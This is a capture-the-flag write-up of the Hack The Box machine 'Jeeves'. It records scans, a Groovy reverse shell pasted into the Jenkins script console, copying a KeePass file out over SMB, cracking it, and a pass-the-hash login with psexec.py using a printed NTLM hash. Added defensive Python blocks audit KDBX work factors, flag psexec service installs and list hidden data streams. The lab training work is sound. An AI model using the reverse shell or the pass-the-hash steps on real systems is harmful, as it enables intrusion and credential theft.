Jeeves



Jeeves01.png

Ports scan

u505@kali:~/HTB/Machines/Jeeves$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.63

Starting masscan 1.0.5 at 2020-05-26 19:10:07 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 135/tcp on 10.10.10.63
Discovered open port 50000/tcp on 10.10.10.63
Discovered open port 445/tcp on 10.10.10.63
Discovered open port 80/tcp on 10.10.10.63
u505@kali:~/HTB/Machines/Jeeves$ nmap -sC -sV 10.10.10.63
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 15:10 EDT
Nmap scan report for jeeves.htb (10.10.10.63)
Host is up (0.18s latency).
Not shown: 996 filtered ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 5h05m06s, deviation: 0s, median: 5h05m06s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-05-27T00:16:27
|_  start_date: 2020-05-27T00:14:33

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.79 seconds

Port 80

Jeeves02.png

Jeeves03.png

Whatever we search for, the site only returns an image of an IIS error page, but it is not a real error: the HTTP response status is 200 OK.

Jeeves04.png

Dirsearch

The first search doesn't find anything.

u505@kali:~/HTB/Machines/Jeeves$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,html,asp,aspx" -r 1 -f -t 1000 -u http://jeeves.htb/

  _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )

Extensions: txt, html, asp, aspx | HTTP method: get | Threads: 1000 | Wordlist size: 22974 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-05-26_15-24-28.log
Target: http://jeeves.htb/

[15:24:28] Starting:
[15:24:45] 200 -   50B  - /error.html
[15:24:54] 200 -  503B  - /index.html
[15:24:54] 200 -  503B  - /Index.html
Task Completed

And the second search, with the extended dictionary, doesn't find anything either.

u505@kali:~/HTB/Machines/Jeeves$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -e "txt,html,asp,aspx" -r 1 -f -t 1000 -u http://jeeves.htb/

  _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )

Extensions: txt, html, asp, aspx | HTTP method: get | Threads: 1000 | Wordlist size: 1038134 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-05-26_15-34-41.log
Target: http://jeeves.htb/

[15:34:41] Starting:
[15:34:43] 200 -  503B  - /index.html
[15:35:14] 200 -   50B  - /error.html
Task Completed

Windows enumeration

While the web enumeration runs, we try to find something on the Windows side.

u505@kali:~/HTB/Machines/Jeeves$ smbclient -L \\10.10.10.63
Enter WORKGROUP\u505's password:
session setup failed: NT_STATUS_ACCESS_DENIED
u505@kali:~/HTB/Machines/Jeeves$ python3 /opt/utils/nullinux/nullinux.py 10.10.10.63

Starting nullinux v5.4.1 | 05-26-2020 15:33


[*] Enumerating Shares for: 10.10.10.63
    Shares          Comments
   -------------------------------------------
[-] No Shares Detected

[*] Enumerating Domain Information for: 10.10.10.63
[-] Could not attain Domain SID

[*] Enumerating querydispinfo for: 10.10.10.63

[*] Enumerating enumdomusers for: 10.10.10.63

[*] Enumerating LSA for: 10.10.10.63

[*] Performing RID Cycling for: 10.10.10.63
[-] RID Failed: Could not attain Domain SID

[*] Testing 10.10.10.63 for Known Users

[*] Enumerating Group Memberships for: 10.10.10.63

[*] 0 unique user(s) identified
u505@kali:~/HTB/Machines/Jeeves$ nmap -p 445 --script=smb-enum-shares 10.10.10.63
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 15:34 EDT
Nmap scan report for jeeves.htb (10.10.10.63)
Host is up (0.043s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 3.89 seconds
u505@kali:~/HTB/Machines/Jeeves$ enum4linux 10.10.10.63
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue May 26 15:34:41 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.63
RID Range ........ 500-550,1000-1050
Username ......... 
Password ......... 
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 =================================================== 
|    Enumerating Workgroup/Domain on 10.10.10.63    |
 =================================================== 
[E] Can't find workgroup/domain


 =========================================== 
|    Nbtstat Information for 10.10.10.63    |
 =========================================== 
Looking up status of 10.10.10.63
No reply from 10.10.10.63

 ==================================== 
|    Session Check on 10.10.10.63    |
 ==================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[E] Server doesn't allow session using username , password .  Aborting remainder of tests.

So anonymous access (no username, no password) is unsuccessful.

Port 50000

Jeeves05.png

Dirsearch

u505@kali:~/HTB/Machines/Jeeves$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,js,ear,war,jsp" -r 1 -f -t 1000 -u http://jeeves.htb:50000/

  _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )
Extensions: txt, js, ear, war, jsp | HTTP method: get | Threads: 1000 | Wordlist size: 27569 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-05-26_15-26-04.log
Target: http://jeeves.htb:50000/
[15:26:04] Starting:
Task Completed

This search finds literally nothing.

u505@kali:~/HTB/Machines/Jeeves$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -e "txt,js,ear,war,jsp" -r 1 -f -t 1000 -u http://jeeves.htb:50000/

  _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )

Extensions: txt, js, ear, war, jsp | HTTP method: get | Threads: 1000 | Wordlist size: 489773 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-05-26_15-41-12.log
Target: http://jeeves.htb:50000/

[15:41:13] Starting:
[15:50:34] 200 -   11KB - /askjeeves/
[15:57:10] Starting: askjeeves/
[15:57:12] 200 -   45KB - /askjeeves/about/
[15:57:12] 200 -   11KB - /askjeeves/people/
[15:57:17] 500 -   15KB - /askjeeves/assets/
[15:57:35] 200 -   10KB - /askjeeves/log/
[15:57:41] 200 -   11KB - /askjeeves/computer/
[15:57:49] 200 -   14KB - /askjeeves/api/
[15:57:54] 403 -  595B  - /askjeeves/me/
[15:57:59] 302 -    0B  - /askjeeves/logout/  ->  http://jeeves.htb:50000/askjeeves/
[15:58:24] 200 -   12KB - /askjeeves/script/
[15:58:28] 200 -   71B  - /askjeeves/robots.txt
CTRL+C detected: Pausing threads, please wait...
Canceled by the user

At least the extended search finds a folder.

Jenkins

Jeeves06.png

Jenkins allows executing Groovy scripts, and I found a Groovy reverse shell.

Jeeves08.png

u505@kali:~/HTB/Machines/Jeeves$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

We paste the Groovy script into the script form.

String host="10.10.14.34";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());
  so.flush();po.flush();Thread.sleep(50);
  try{p.exitValue();break;}catch(Exception e){}
};
p.destroy();s.close();

Jeeves09.png

u505@kali:~/HTB/Machines/Jeeves$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.63.
Ncat: Connection from 10.10.10.63:49677.
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\.jenkins>whoami
whoami
jeeves\kohsuke

User Flag

c:\Users\kohsuke\Desktop>type user.txt
type user.txt
<USER_FLAG>

System enumeration

Systeminfo

c:\Users\kohsuke\Desktop>systeminfo
systeminfo

Host Name:                 JEEVES
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.10586 N/A Build 10586
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00331-20304-47406-AA297
Original Install Date:     10/25/2017, 4:45:33 PM
System Boot Time:          5/26/2020, 8:14:12 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,011 MB
Virtual Memory: Max Size:  2,687 MB
Virtual Memory: Available: 1,576 MB
Virtual Memory: In Use:    1,111 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 10 Hotfix(s) Installed.
                           [01]: KB3150513
                           [02]: KB3161102
                           [03]: KB3172729
                           [04]: KB3173428
                           [05]: KB4021702
                           [06]: KB4022633
                           [07]: KB4033631
                           [08]: KB4035632
                           [09]: KB4051613
                           [10]: KB4041689
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.63
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

The system is Windows 10 with hotfixes installed, so the likelihood of an unpatched OS vulnerability when the box was released was very small; we look for more information instead.

Document folder

c:\Users\kohsuke\Documents>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

Directory of c:\Users\kohsuke\Documents
11/03/2017  11:18 PM    <DIR>          .
11/03/2017  11:18 PM    <DIR>          ..
09/18/2017  01:43 PM             2,846 CEH.kdbx
               1 File(s)          2,846 bytes
               2 Dir(s)   7,497,703,424 bytes free

There is a KeePass file in the Documents folder. I first tried to use certutil to convert the file to base64 so I could copy/paste it, but the utility is not available. So we set up Samba on our box to copy the file.

u505@kali:~/HTB/Machines/Jeeves$ sudo mv /etc/samba/smb.conf /etc/samba/smb.conf.bck
[sudo] password for u505:

u505@kali:~/HTB/Machines/Jeeves$ sudo vi /etc/samba/smb.conf
u505@kali:~/HTB/Machines/Jeeves$ cat /etc/samba/smb.conf
[u505]
path = /home/u505/HTB/Machines/Jeeves/samba
valid users = u505
read only = no

Samba startup.

u505@kali:~/HTB/Machines/Jeeves$ sudo systemctl start smbd
u505@kali:~/HTB/Machines/Jeeves$ sudo systemctl status smbd
● smbd.service - Samba SMB Daemon
     Loaded: loaded (/lib/systemd/system/smbd.service; disabled; vendor preset:>
     Active: active (running) since Tue 2020-05-26 17:59:18 EDT; 4s ago
       Docs: man:smbd(8)
             man:samba(7)
             man:smb.conf(5)
    Process: 10973 ExecStartPre=/usr/share/samba/update-apparmor-samba-profile >
   Main PID: 10982 (smbd)
     Status: "smbd: ready to serve connections..."
      Tasks: 4 (limit: 18961)
     Memory: 14.5M
     CGroup: /system.slice/smbd.service
             ├─10982 /usr/sbin/smbd --foreground --no-process-group
             ├─10985 /usr/sbin/smbd --foreground --no-process-group
             ├─10986 /usr/sbin/smbd --foreground --no-process-group
             └─10987 /usr/sbin/smbd --foreground --no-process-group

May 26 17:59:17 kali systemd[1]: Starting Samba SMB Daemon...
May 26 17:59:17 kali update-apparmor-samba-profile[10976]: grep: /etc/apparmor.>
May 26 17:59:17 kali update-apparmor-samba-profile[10979]: diff: /etc/apparmor.>
May 26 17:59:18 kali smbd[10982]: [2020/05/26 17:59:18.096126,  0] ../../lib/ut>
May 26 17:59:18 kali smbd[10982]:   daemon_ready: daemon 'smbd' finished starti>
May 26 17:59:18 kali systemd[1]: Started Samba SMB Daemon.

Create our samba user.

u505@kali:~/HTB/Machines/Jeeves$ sudo smbpasswd -a u505
New SMB password:
Retype new SMB password:
Added user u505.

From the target we map the network share as disk drive U:

c:\Users\kohsuke\Documents>net use U: \\10.10.14.34\u505 /user:\u505 password
net use U: \\10.10.14.34\u505 /user:\u505 password
The command completed successfully.

Copy the file to our box.

c:\Users\kohsuke\Documents>copy CEH.kdbx U:\
copy CEH.kdbx U:\
        1 file(s) copied.

Brute force keepass file

u505@kali:~/HTB/Machines/Jeeves/samba$ file CEH.kdbx
CEH.kdbx: Keepass password database 2.x KDBX

Generate the john hash from the kdbx file.

u505@kali:~/HTB/Machines/Jeeves/samba$ keepass2john CEH.kdbx > ../keepass.hash

Crack with john.

u505@kali:~/HTB/Machines/Jeeves$ john -w=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt keepass.hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1       (CEH)
1g 0:00:00:13 DONE (2020-05-26 18:08) 0.07347g/s 4039p/s 4039c/s 4039C/s nichole2..monyong
Use the "--show" option to display all of the cracked passwords reliably
Session completed
u505@kali:~/HTB/Machines/Jeeves$ john keepass.hash --show
CEH:moonshine1

1 password hash cracked, 0 left
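An added example, not part of the original writeup, on why this crack took only 13 seconds: john's line "Cost 1 (iteration count) is 6000" is the AES-KDF transform round count stored in the KDBX outer header, and a cracker pays exactly that many AES operations per guess. The Python below builds a constructed KDBX 3.1 header with dummy seeds (no real database is read), parses it back to recover the round count, and scales john's observed 4039 guesses/s to other round counts. The header builder, the 1,000,000-round policy threshold and the linear scaling estimate are assumptions of this example; KDBX 4 files keep their KDF parameters in a different header field and are rejected by the parser.

```python
import struct

# KDBX file signature and the KDBX 3.x outer-header field IDs.
KDBX_SIG1 = 0x9AA2D903
KDBX_SIG2 = 0xB54BFB67
FIELD_END, FIELD_CIPHER_ID, FIELD_COMPRESSION = 0, 2, 3
FIELD_MASTER_SEED, FIELD_TRANSFORM_SEED, FIELD_TRANSFORM_ROUNDS, FIELD_IV = 4, 5, 6, 7
AES256_UUID = bytes.fromhex("31c1f2e6bf714350be5805216afc5aff")  # KeePass cipher UUID for AES-256


def build_kdbx3_header(transform_rounds: int) -> bytes:
    """Constructed sample: a minimal KDBX 3.1 outer header (no payload) so the parser runs offline."""
    fields = [
        (FIELD_CIPHER_ID, AES256_UUID),
        (FIELD_COMPRESSION, struct.pack("<I", 1)),      # 1 = gzip
        (FIELD_MASTER_SEED, b"\x11" * 32),               # dummy seeds and IV, not from any real file
        (FIELD_TRANSFORM_SEED, b"\x22" * 32),
        (FIELD_TRANSFORM_ROUNDS, struct.pack("<Q", transform_rounds)),
        (FIELD_IV, b"\x33" * 16),
        (FIELD_END, b"\r\n\r\n"),
    ]
    header = struct.pack("<III", KDBX_SIG1, KDBX_SIG2, 0x00030001)  # file version 3.1
    for fid, data in fields:
        header += struct.pack("<BH", fid, len(data)) + data         # KDBX 3: 1-byte id, 2-byte length
    return header


def parse_kdbx3_header(blob: bytes) -> dict:
    """Read a KDBX 3.x outer header and return version, cipher and the AES-KDF round count."""
    sig1, sig2, version = struct.unpack_from("<III", blob, 0)
    if (sig1, sig2) != (KDBX_SIG1, KDBX_SIG2):
        raise ValueError("not a KDBX file")
    major, minor = version >> 16, version & 0xFFFF
    if major != 3:
        # KDBX 4 moved the KDF parameters (AES-KDF or Argon2) into a VariantDictionary (field 11).
        raise ValueError(f"unsupported KDBX version {major}.{minor}")
    fields, pos = {}, 12
    while True:
        fid, size = struct.unpack_from("<BH", blob, pos)
        pos += 3
        fields[fid] = blob[pos:pos + size]
        pos += size
        if fid == FIELD_END:
            break
    rounds = struct.unpack("<Q", fields[FIELD_TRANSFORM_ROUNDS])[0]
    cipher = "AES-256" if fields.get(FIELD_CIPHER_ID) == AES256_UUID else "other"
    return {"version": f"{major}.{minor}", "cipher": cipher, "transform_rounds": rounds}


def scaled_guess_rate(measured_rate: float, measured_rounds: int, target_rounds: int) -> float:
    """AES-KDF cost is linear in the round count, so guesses/s scale inversely with rounds (assumed model)."""
    return measured_rate * measured_rounds / target_rounds


def audit_kdbx(blob: bytes, min_rounds: int = 1_000_000) -> dict:
    """Flag a database whose round count is below a policy minimum (threshold is an assumption here)."""
    info = parse_kdbx3_header(blob)
    info["weak_kdf"] = info["transform_rounds"] < min_rounds
    return info


if __name__ == "__main__":
    sample = build_kdbx3_header(6000)   # same round count john reported for CEH.kdbx
    print(audit_kdbx(sample))
    # john managed ~4039 guesses/s at 6000 rounds; at 6,000,000 rounds the same hardware would do:
    print(f"{scaled_guess_rate(4039, 6000, 6_000_000):.3f} guesses/s")
```

The takeaway for defenders: a KeePass database's resistance to an offline attack is the product of password strength and the KDF work factor, and the work factor is readable in cleartext from the file header, so auditing it across a fleet of .kdbx files needs no password at all.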

Jeeves10.png

There are several users and passwords (that I tried unsuccessfully).

Jeeves11.png

The backup entry seems to be an NTLM hash.

Jeeves12.png

Privilege escalation

psexec.py from Impacket can pass the hash directly.

u505@kali:~/HTB/Machines/Jeeves$ /opt/utils/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 administrator@10.10.10.63
Impacket v0.9.22.dev1+20200520.120526.3f1e7ddd - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.63.....
[*] Found writable share ADMIN$
[*] Uploading file TJzxQaLW.exe
[*] Opening SVCManager on 10.10.10.63.....
[*] Creating service yTGt on 10.10.10.63.....
[*] Starting service yTGt.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
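A defender-side example, added here and not part of the original writeup: the psexec.py run above leaves a very characteristic trace, a service with a generated name (yTGt) whose binary (TJzxQaLW.exe) was uploaded through ADMIN$, i.e. straight into C:\Windows. The Service Control Manager records every service installation as Event ID 7045 in the System log, so this is detectable from logs alone. The block parses a constructed, flattened sample of such events and flags that combination. The `key=value` line layout, the sample events, the C:\Windows location for %SystemRoot% and the name heuristic are assumptions of this example, not a real log format or a vendor rule.

```python
import re

# Constructed sample of System-log 7045 ("A service was installed in the system")
# records, flattened to one key=value line each for this example. The first line
# mirrors the service psexec.py created above: name yTGt, binary TJzxQaLW.exe
# uploaded through ADMIN$ (C:\Windows). The others are benign look-alikes.
SAMPLE_EVENTS = [
    r'EventID=7045 ServiceName=yTGt ImagePath=%SystemRoot%\TJzxQaLW.exe ServiceType="user mode service" StartType="demand start"',
    r'EventID=7045 ServiceName=VMTools ImagePath="C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" ServiceType="user mode service" StartType="auto start"',
    r'EventID=7045 ServiceName=Dhcp ImagePath="%SystemRoot%\system32\svchost.exe -k LocalServiceNetworkRestricted" ServiceType="user mode service" StartType="auto start"',
    r'EventID=7036 ServiceName=yTGt State=stopped',
]

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
SYSTEM_ROOT = r"C:\Windows"  # assumed expansion of %SystemRoot%, which is what ADMIN$ maps to


def parse_event(line: str) -> dict:
    """Turn one flattened event line into a dict; quoted values may contain spaces."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in KV_RE.finditer(line)}


def image_binary(image_path: str) -> str:
    """Extract the executable from a service ImagePath (arguments dropped, %SystemRoot% expanded)."""
    m = re.match(r'\s*"?(.+?\.(?:exe|sys))', image_path, re.IGNORECASE)
    path = m.group(1) if m else image_path.strip().split(" ")[0]
    return re.sub(r"%SystemRoot%|%windir%", lambda _: SYSTEM_ROOT, path, flags=re.IGNORECASE)


def looks_generated(name: str) -> bool:
    """Heuristic for generator-style names such as yTGt or TJzxQaLW: 4-8 letters with at
    least two upper/lower-case flips. Ordinary names (Dhcp, VMTools) have at most one."""
    if not re.fullmatch(r"[A-Za-z]{4,8}", name):
        return False
    flips = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    return flips >= 2


def assess_service_install(event: dict) -> list:
    """Return the reasons a 7045 event resembles a remote-execution service drop (empty if none)."""
    if event.get("EventID") != "7045":
        return []
    reasons = []
    binary = image_binary(event.get("ImagePath", ""))
    directory, _, filename = binary.rpartition("\\")
    if directory.lower() == SYSTEM_ROOT.lower():
        reasons.append(f"binary {filename} sits directly in {SYSTEM_ROOT} (the ADMIN$ root)")
    name = event.get("ServiceName", "")
    if looks_generated(name):
        reasons.append(f"service name {name} looks randomly generated")
    stem = filename.rsplit(".", 1)[0]
    if looks_generated(stem):
        reasons.append(f"binary name {filename} looks randomly generated")
    return reasons


def scan_events(lines) -> list:
    """Run the assessment over event lines; returns one (service name, reasons) pair per alert."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        reasons = assess_service_install(event)
        if reasons:
            alerts.append((event.get("ServiceName", "?"), reasons))
    return alerts


if __name__ == "__main__":
    for name, reasons in scan_events(SAMPLE_EVENTS):
        print(f"ALERT service {name}:")
        for r in reasons:
            print(f"  - {r}")
```

In production the name heuristic needs an allowlist (a few legitimate services also have mixed-case short names), but the "new service whose binary was just written to the root of C:\Windows" condition on its own is worth an alert, and correlating it with the preceding SMB write to ADMIN$ (Event ID 5145 when object access auditing is on) makes the pattern unambiguous. The nmap output earlier also shows SMB signing "enabled but not required"; requiring it is the usual hardening step on the same attack path.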

Root Flag

C:\Windows\system32>cd c:\users\administrator\Desktop

c:\Users\Administrator\Desktop>dir /a
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of c:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
11/03/2017  10:03 PM               282 desktop.ini
12/24/2017  03:51 AM                36 hm.txt
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               3 File(s)          1,115 bytes
               2 Dir(s)   7,497,236,480 bytes free

c:\Users\Administrator\Desktop>type hm.txt
The flag is elsewhere.  Look deeper.

After a long search, the root flag turned out to be right under our noses: it was hidden in an alternate data stream (ADS) attached to hm.txt, which a plain dir listing does not show.

c:\Users\Administrator\Desktop>dir /r
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of c:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   7,497,236,480 bytes free

With the more command, redirecting the stream as its input, we can read the ADS.

c:\Users\Administrator\Desktop>more <hm.txt:root.txt                           
<ROOT_FLAG>
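An added example, not part of the original writeup, of the check a defender would run after seeing this: since a plain dir hides alternate data streams, a baseline of a sensitive directory should include its streams. The Python below parses a constructed `dir /r` listing modelled on the one above, skips the Zone.Identifier stream that Windows itself attaches to downloaded files, and reports every other named $DATA stream. The sample listing (including the Zone.Identifier line added to the .lnk), the regexes and the allowlist are assumptions of this example.

```python
import re

# Constructed sample of `dir /r` output, modelled on the Administrator Desktop
# listing above. The Zone.Identifier stream on the .lnk is added here as the
# typical benign stream (mark-of-the-web) so the allowlist has something to skip.
SAMPLE_DIR_R = r""" Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of c:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
                                    26 Windows 10 Update Assistant.lnk:Zone.Identifier:$DATA
               2 File(s)            833 bytes
               2 Dir(s)   7,497,236,480 bytes free
"""

# "Directory of <path>" header lines track which folder the entries belong to.
DIR_RE = re.compile(r"^\s*Directory of (.+?)\s*$")
# Stream lines are indented, carry only a size, and end in name:stream:$DATA.
STREAM_RE = re.compile(r"^\s+([\d,]+)\s+(.+?):([^:]+):\$DATA\s*$")

BENIGN_STREAMS = ("Zone.Identifier",)  # mark-of-the-web; expected on downloaded files


def find_streams(listing: str, ignore=BENIGN_STREAMS) -> list:
    """Return every named $DATA stream in a `dir /r` listing, except stream names in `ignore`."""
    found, directory = [], None
    for line in listing.splitlines():
        d = DIR_RE.match(line)
        if d:
            directory = d.group(1)
            continue
        m = STREAM_RE.match(line)
        if not m:
            continue
        size = int(m.group(1).replace(",", ""))
        filename, stream = m.group(2), m.group(3)
        if stream in ignore:
            continue
        found.append({"directory": directory, "file": filename, "stream": stream, "size": size})
    return found


def report(listing: str) -> list:
    """One human-readable line per hidden stream, in path:stream form."""
    return [f"{s['directory']}\\{s['file']}:{s['stream']} ({s['size']} bytes)"
            for s in find_streams(listing)]


if __name__ == "__main__":
    for line in report(SAMPLE_DIR_R):
        print("hidden stream:", line)
```

On the host itself the same enumeration is available natively in PowerShell with Get-Item -Stream * on a file (and Get-Content -Stream <name> to read one), which is the form to use in a scheduled integrity check rather than scraping dir output.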

References

Daniel Simao 20:23, 26 May 2020 (EDT)